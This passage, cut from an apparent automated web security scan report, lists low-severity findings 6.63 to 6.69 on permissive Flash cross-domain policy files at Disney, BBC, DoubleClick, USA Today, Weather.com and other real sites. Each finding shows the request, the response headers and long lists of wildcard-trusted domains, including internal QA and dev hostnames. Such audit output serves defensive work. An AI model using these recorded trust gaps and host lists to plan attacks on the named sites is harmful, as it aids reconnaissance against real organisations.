<allow-access-from domain="disneyweddings.disney.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="disneymeetings.disney.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="adisneyworldmeetings.disney.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="dvc.disney.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="jp.dvc.disney.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="dvcmember.disney.co.jp" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="dvcmember.disney.co.jp" to-ports="*" secure="true"/>
...[SNIP]...
<allow-access-from domain="advc.disney.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="dvc-qa1-1.disney.go.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="dvc-qa1-1.disney.go.com" to-ports="*" secure="true"/>
...[SNIP]...
<allow-access-from domain="dvc-qa1-2.disney.go.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="dvc-qa1-2.disney.go.com" to-ports="*" secure="true"/>
...[SNIP]...
<allow-access-from domain="dvc-qa2-1.disney.go.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="dvc-qa2-1.disney.go.com" to-ports="*" secure="true"/>
...[SNIP]...
<allow-access-from domain="dvc-qa2-2.disney.go.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="dvc-qa2-2.disney.go.com" to-ports="*" secure="true"/>
...[SNIP]...
<allow-access-from domain="disneycruise.disney.go.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="adisneycruise.disney.go.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="disneyworld.disney.go.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="adisneyworld.disney.go.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="secure.disney.go.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="secure.disney.go.com" to-ports="*" secure="true"/>
...[SNIP]...
<allow-access-from domain="disneyparks.disney.go.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="adisneyparks.disney.go.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="disneyland.disney.go.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="adisneyland.disney.go.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="abd.disney.go.com" to-ports="*" secure="true"/>
...[SNIP]...
<allow-access-from domain="abd.disney.go.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="destinations.disney.go.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="adestinations.disney.go.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="radio.disney.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="*.hongkongdisneyland.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="disneysmagicalbeginnings.com" />

<allow-access-from domain="*.hongkongdisneyland.com.cn" to-ports="*" />
...[SNIP]...
<allow-access-from domain="park.hongkongdisneyland.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="*.secure2.hongkongdisneyland.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="*.secure.hongkongdisneyland.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="mediacdn.hongkongdisneyland.com.cn" to-ports="*" />
...[SNIP]...
<allow-access-from domain="mediacdn2.hongkongdisneyland.com.cn" to-ports="*" />
...[SNIP]...
<allow-access-from domain="ahongkongdisneyland.disney.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="*.secondthought.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="*.adtoolsinc.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="*.unionstudio.net" secure="false" />
...[SNIP]...
<allow-access-from domain="*.cyberwocky.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.peelinteractive.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.northkingdom.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="bookwdw.reservations.disney.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="content-loc.disney.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="static-loc.disney.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="content-dev1.disney.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="static-dev1.disney.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="dnhwdproweb01.online.disney.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="disneyworld-dev1.disney.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="disneyworld-sl.disney.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="as1.wdpromedia.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="wdw.wdpromedia.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="wdw1.wdpromedia.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="wdw2.wdpromedia.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="*.wdpromedia.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="parksandresorts.wdpromedia.com" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="disneyworld2-qa2.disney.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="disney.prizelogic.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="www.nthdegreefx.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="disneyworld-qa2-1.disney.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="disneyworld-qa2-2.disney.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="*.triggerla.com" to-port="*" />
...[SNIP]...
<allow-access-from domain="*.triggersh.com" to-port="*" />
...[SNIP]...
<allow-access-from domain="*.omniticket.net" to-ports="*" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.omniticket.net" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.omniticket.com" to-ports="*" secure="true"/>
...[SNIP]...
<allow-access-from domain="dnhwdproweb01.wdig.com" to-port="*" />
...[SNIP]...
<allow-access-from domain="dlr1.wdpromedia.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="dlr2.wdpromedia.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="m.disneyland.disney.go.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="m.disneyland-qa3.disney.go.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="m.disneyland-sl.disney.go.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="m.disneyland-dev9.disney.go.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="disneyland-dev9.disney.go.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="disneyland-local.go.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="disneyland-lt.disney.go.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="disneyland-qa3.disney.go.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="disneyland-sl.disney.go.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="qa-generic03.disney.go.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="disneyyouth-qa5.disney.go.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="disney.thismoment.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="thismoment.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="disney.stage2.thismoment.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="disneyinstitute.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="dvc-qa01.disney.go.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="dvc-qa02.disney.go.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="dvc-nap7.disney.go.com" to-ports="*" secure="false" />
...[SNIP]...

6.63. http://disneycruise.disney.go.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://disneycruise.disney.go.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: disneycruise.disney.go.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=300
Content-Length: 8308
Content-Type: text/xml
Last-Modified: Sat, 26 Feb 2011 00:32:21 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Expires: Mon, 16 May 2011 01:35:44 GMT
Date: Mon, 16 May 2011 01:35:02 GMT
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="*.go.com" secure="false" to-ports="*" />
...[SNIP]...
<allow-access-from domain="avmk.disney.go.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="vmk.disney.go.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.disney.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="*.disney.go.com" secure="false" to-ports="*" />
...[SNIP]...
<allow-access-from domain="*.starwave.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="*.online.disney.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="espnwwos.disney.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="disneyworldsports.disney.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="adisneyworldsports.disney.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="www.disneyyouth.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="youthprograms.disney.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="disneyweddings.disney.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="disneymeetings.disney.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="adisneyworldmeetings.disney.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="dvc.disney.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="jp.dvc.disney.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="dvcmember.disney.co.jp" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="dvcmember.disney.co.jp" to-ports="*" secure="true"/>
...[SNIP]...
<allow-access-from domain="advc.disney.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="dvc-qa1-1.disney.go.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="dvc-qa1-1.disney.go.com" to-ports="*" secure="true"/>
...[SNIP]...
<allow-access-from domain="dvc-qa1-2.disney.go.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="dvc-qa1-2.disney.go.com" to-ports="*" secure="true"/>
...[SNIP]...
<allow-access-from domain="dvc-qa2-1.disney.go.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="dvc-qa2-1.disney.go.com" to-ports="*" secure="true"/>
...[SNIP]...
<allow-access-from domain="dvc-qa2-2.disney.go.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="dvc-qa2-2.disney.go.com" to-ports="*" secure="true"/>
...[SNIP]...
<allow-access-from domain="adisneycruise.disney.go.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="disneyworld.disney.go.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="adisneyworld.disney.go.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="secure.disney.go.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="secure.disney.go.com" to-ports="*" secure="true"/>
...[SNIP]...
<allow-access-from domain="disneyparks.disney.go.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="adisneyparks.disney.go.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="disneyland.disney.go.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="adisneyland.disney.go.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="abd.disney.go.com" to-ports="*" secure="true"/>
...[SNIP]...
<allow-access-from domain="abd.disney.go.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="destinations.disney.go.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="adestinations.disney.go.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="radio.disney.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="*.hongkongdisneyland.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="disneysmagicalbeginnings.com" />

<allow-access-from domain="*.hongkongdisneyland.com.cn" to-ports="*" />
...[SNIP]...
<allow-access-from domain="park.hongkongdisneyland.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="*.secure2.hongkongdisneyland.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="*.secure.hongkongdisneyland.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="mediacdn.hongkongdisneyland.com.cn" to-ports="*" />
...[SNIP]...
<allow-access-from domain="mediacdn2.hongkongdisneyland.com.cn" to-ports="*" />
...[SNIP]...
<allow-access-from domain="ahongkongdisneyland.disney.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="*.secondthought.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="*.adtoolsinc.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="*.unionstudio.net" secure="false" />
...[SNIP]...
<allow-access-from domain="*.cyberwocky.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.peelinteractive.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.northkingdom.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="bookwdw.reservations.disney.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="content-loc.disney.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="static-loc.disney.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="content-dev1.disney.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="static-dev1.disney.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="dnhwdproweb01.online.disney.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="disneyworld-dev1.disney.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="disneyworld-sl.disney.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="as1.wdpromedia.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="wdw.wdpromedia.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="wdw1.wdpromedia.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="wdw2.wdpromedia.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="*.wdpromedia.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="parksandresorts.wdpromedia.com" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="disneyworld2-qa2.disney.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="disney.prizelogic.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="www.nthdegreefx.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="disneyworld-qa2-1.disney.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="disneyworld-qa2-2.disney.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="*.triggerla.com" to-port="*" />
...[SNIP]...
<allow-access-from domain="*.triggersh.com" to-port="*" />
...[SNIP]...
<allow-access-from domain="*.omniticket.net" to-ports="*" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.omniticket.net" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.omniticket.com" to-ports="*" secure="true"/>
...[SNIP]...
<allow-access-from domain="dnhwdproweb01.wdig.com" to-port="*" />
...[SNIP]...
<allow-access-from domain="dlr1.wdpromedia.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="dlr2.wdpromedia.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="m.disneyland.disney.go.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="m.disneyland-qa3.disney.go.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="m.disneyland-sl.disney.go.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="m.disneyland-dev9.disney.go.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="disneyland-dev9.disney.go.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="disneyland-local.go.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="disneyland-lt.disney.go.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="disneyland-qa3.disney.go.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="disneyland-sl.disney.go.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="qa-generic03.disney.go.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="disneyyouth-qa5.disney.go.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="disney.thismoment.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="thismoment.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="disney.stage2.thismoment.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="disneyinstitute.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="dvc-qa01.disney.go.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="dvc-qa02.disney.go.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="dvc-nap7.disney.go.com" to-ports="*" secure="false" />
...[SNIP]...

6.64. http://feeds.bbci.co.uk/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://feeds.bbci.co.uk
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: feeds.bbci.co.uk

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Wed, 20 Apr 2011 09:07:59 GMT
Content-Type: text/xml
Cache-Control: max-age=120
Expires: Sun, 15 May 2011 21:21:04 GMT
Date: Sun, 15 May 2011 21:19:04 GMT
Content-Length: 1081
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-o
...[SNIP]...
<allow-access-from domain="downloads.bbc.co.uk" />
   <allow-access-from domain="www.bbcamerica.com" />
   <allow-access-from domain="*.bbcamerica.com" />
   <allow-access-from domain="www.bbc.co.uk" />
   <allow-access-from domain="news.bbc.co.uk" />
   <allow-access-from domain="newsimg.bbc.co.uk"/>
   <allow-access-from domain="nolpreview11.newsonline.tc.nca.bbc.co.uk" />
   <allow-access-from domain="newsrss.bbc.co.uk" />
   <allow-access-from domain="newsapi.bbc.co.uk" />
   <allow-access-from domain="extdev.bbc.co.uk" />
   <allow-access-from domain="stats.bbc.co.uk" />
   <allow-access-from domain="*.bbc.co.uk"/>
   <allow-access-from domain="*.bbci.co.uk"/>
   <allow-access-from domain="*.bbc.com"/>
...[SNIP]...
<allow-access-from domain="jam.bbc.co.uk" />
   <allow-access-from domain="dc01.dc.bbc.co.uk" />
...[SNIP]...

6.65. http://googleads.g.doubleclick.net/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: googleads.g.doubleclick.net

Response

HTTP/1.0 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/x-cross-domain-policy; charset=UTF-8
Last-Modified: Thu, 04 Feb 2010 20:17:40 GMT
Date: Sun, 15 May 2011 10:44:43 GMT
Expires: Mon, 16 May 2011 10:44:43 GMT
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Age: 38783
Cache-Control: public, max-age=86400

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="maps.gstatic.com" />
<allow-access-from domain="maps.gstatic.cn" />
<allow-access-from domain="*.googlesyndication.com" />
<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.google.ae" />
<allow-access-from domain="*.google.at" />
<allow-access-from domain="*.google.be" />
<allow-access-from domain="*.google.ca" />
<allow-access-from domain="*.google.ch" />
<allow-access-from domain="*.google.cn" />
<allow-access-from domain="*.google.co.il" />
<allow-access-from domain="*.google.co.in" />
<allow-access-from domain="*.google.co.jp" />
<allow-access-from domain="*.google.co.kr" />
<allow-access-from domain="*.google.co.nz" />
<allow-access-from domain="*.google.co.sk" />
<allow-access-from domain="*.google.co.uk" />
<allow-access-from domain="*.google.co.ve" />
<allow-access-from domain="*.google.co.za" />
<allow-access-from domain="*.google.com.ar" />
<allow-access-from domain="*.google.com.au" />
<allow-access-from domain="*.google.com.br" />
<allow-access-from domain="*.google.com.gr" />
<allow-access-from domain="*.google.com.hk" />
<allow-access-from domain="*.google.com.ly" />
<allow-access-from domain="*.google.com.mx" />
<allow-access-from domain="*.google.com.my" />
<allow-access-from domain="*.google.com.pe" />
<allow-access-from domain="*.google.com.ph" />
<allow-access-from domain="*.google.com.pk" />
<allow-access-from domain="*.google.com.ru" />
<allow-access-from domain="*.google.com.sg" />
<allow-access-from domain="*.google.com.tr" />
<allow-access-from domain="*.google.com.tw" />
<allow-access-from domain="*.google.com.ua" />
<allow-access-from domain="*.google.com.vn" />
<allow-access-from domain="*.google.de" />
<allow-access-from domain="*.google.dk" />
<allow-access-from domain="*.google.es" />
<allow-access-from domain="*.google.fi" />
<allow-access-from domain="*.google.fr" />
<allow-access-from domain="*.google.it" />
<allow-access-from domain="*.google.lt" />
<allow-access-from domain="*.google.lv" />
<allow-access-from domain="*.google.nl" />
<allow-access-from domain="*.google.no" />
<allow-access-from domain="*.google.pl" />
<allow-access-from domain="*.google.pt" />
<allow-access-from domain="*.google.ro" />
<allow-access-from domain="*.google.se" />
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="*.ytimg.com" />
<allow-access-from domain="*.2mdn.net" />
<allow-access-from domain="*.doubleclick.net" />
<allow-access-from domain="*.doubleclick.com" />
...[SNIP]...

6.66. http://i.usatoday.net/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://i.usatoday.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: i.usatoday.net

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Wed, 16 Mar 2011 20:16:48 GMT
ETag: "0f8ee1317e4cb1:0"
Server: Microsoft-IIS/7.5
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI"
Date: Mon, 16 May 2011 01:19:46 GMT
Content-Length: 1558
Connection: close

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*.usatoday.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.usatoday.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.gannettonline.com"/>
   <allow-access-from domain="www.smashingideas.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="beta.tagware.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="nmp.newsgator.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="maventechnologies.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.maventechnologies.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="mavenapps.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.mavenapps.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="hostlogic.ca" secure="true"/>
...[SNIP]...
<allow-access-from domain="pages.samsung.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.pointroll.com" />
   <allow-access-from domain="*.facebook.com" />
   <allow-access-from domain="demo.pointroll.net" />
   <allow-access-from domain="*.brightcove.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.metagrapher.com" />
...[SNIP]...

6.67. http://images.scanalert.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://images.scanalert.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: images.scanalert.com

Response

HTTP/1.0 200 OK
Server: McAfeeSecure
ETag: "EKdW2Rg2Poz"
Last-Modified: Wed, 03 Sep 2008 18:43:59 GMT
Accept-Ranges: bytes
Content-Type: text/xml; charset=utf-8
Content-Length: 116
Date: Mon, 16 May 2011 01:39:43 GMT
Connection: close
Cache-Control: private

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*.scanalert.com"/>
</cross-domain-policy>

6.68. http://imawow.weather.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://imawow.weather.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: imawow.weather.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:19:59 GMT
Server: Apache
SVRNAME: web1x11
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 2057
Keep-Alive: timeout=1, max=7387
Connection: Keep-Alive
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.weather.com" />
<allow-access-from domain="*.epicmashup.com" />
<allow-access-from domain="showcase.weather.com" />
<allow-access-from domain="*.chumby.com" />
<allow-access-from domain="*.imwx.com" />
<allow-access-from domain="*.rga.com" />
<allow-access-from domain="*.jnj.com" />

<allow-access-from domain="*.zyrtec.com" />
<allow-access-from domain="*.amazonaws.com" />
<allow-access-from domain="*.gigyahosting.com" />
<allow-access-from domain="*.gigyahosting1.com" />
<allow-access-from domain="media.pointroll.com" />
<allow-access-from domain="www.pointroll.com" />
<allow-access-from domain="data.pointroll.com" />
<allow-access-from domain="speed.pointroll.com" />
<allow-access-from domain="mirror.pointroll.com" />
<allow-access-from domain="adportal.pointroll.com" />
<allow-access-from domain="*.ge.com" />
<allow-access-from domain="*.inbcu.com" />
<allow-access-from domain="widgets.nbcuni.com" />
<allow-access-from domain="*.ivillage.com" />
<allow-access-from domain="devworks.ivillage.com" />
<allow-access-from domain="devi.ivillage.com" />
<allow-access-from domain="i.ivillage.com" />
<allow-access-from domain="www.ivillage.com" />
<allow-access-from domain="msnbcmedia.msn.com" />
<allow-access-from domain="*.tvpdigital.com" />
<allow-access-from domain="*.brightcove.com" />
<allow-access-from domain="apps.eyewonderlabs.com" />
<allow-access-from domain="*.eyewonder.com" />
<allow-access-from domain="fjpecvaa.joyent.us" />
<allow-access-from domain="widget.bravotv.com" />
<allow-access-from domain="*.jwtdev.com" />
<allow-access-from domain="*.jwtweb.com" />
<allow-access-from domain="*.na.jnj.com" />
<allow-access-from domain="*2mdn.net" />
<allow-access-from domain="*.googlesyndication.com" />
...[SNIP]...

6.69. http://login.dotomi.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://login.dotomi.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

